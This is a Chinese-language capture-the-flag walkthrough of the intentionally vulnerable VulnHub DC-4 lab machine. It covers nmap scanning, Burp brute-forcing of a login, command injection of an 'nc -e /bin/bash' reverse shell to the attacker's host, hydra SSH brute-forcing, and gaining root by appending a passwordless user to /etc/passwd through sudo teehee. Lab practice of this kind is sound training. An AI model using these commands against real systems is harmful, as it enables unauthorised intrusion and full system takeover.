项目地址

https://download.vulnhub.com/dc/DC-4.zip

实验过程

将下载好的靶机导入到VMware中，设置网络模式为NAT模式，然后开启靶机虚拟机

使用nmap进行主机发现，获取靶机IP地址

nmap 192.168.47.1-254

根据对比可知DC-4的一个ip地址为192.168.47.145

扫描DC-4的操作系统，端口及对应服务

nmap -A -p- 192.168.47.145

发现开放22和80端口

访问http://192.168.47.145

发现是个登录界面

尝试使用BP抓包进行爆破

发送到Intruder模块

载入密码字典，开始攻击

对lenth进行排序，发现一个长度异常单位

使用这个密码尝试登录

登录成功

漏洞利用

发现这里可以执行相关命令

可以考虑使用BP篡改数据包来反弹shell

抓包

发现radio可以修改

设置监听

nc -lvvp 8888

反弹shell

注意原数据包空格用+代替的，所以我们也用+来代替

nc+-e+/bin/bash+192.168.47.129+8888

放包

反弹成功

获得交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

提权

四处翻翻

翻到一份密码字典

一个没权限查看的文件

复制一份内容写进password.txt文件中

使用hydra命令进行爆破

hydra -l jim -P password.txt -t 1 -vV -e ns 192.168.47.145 ssh -o ssh.txt -f ssh://192.168.47.145

爆破出来密码是jibril04

使用ssh连接

连接成功

尝试查看刚才没权限的那个文件

cat /home/jim/mbox

看上去像是收到一封邮件

去var/mail找找

cat /var/mail/jim

通过文件内容得到了charles的密码^xHhA&hvim0y

登录charles账户

登录成功

查看权限

发现charles有teehee命令的权限

使用teehee创建一个root用户

echo "huacha::0:0:::/bin/sh" | sudo teehee -a /etc/passwd

添加成功

切换账户

发现flag.txt在/root目录下

查看flag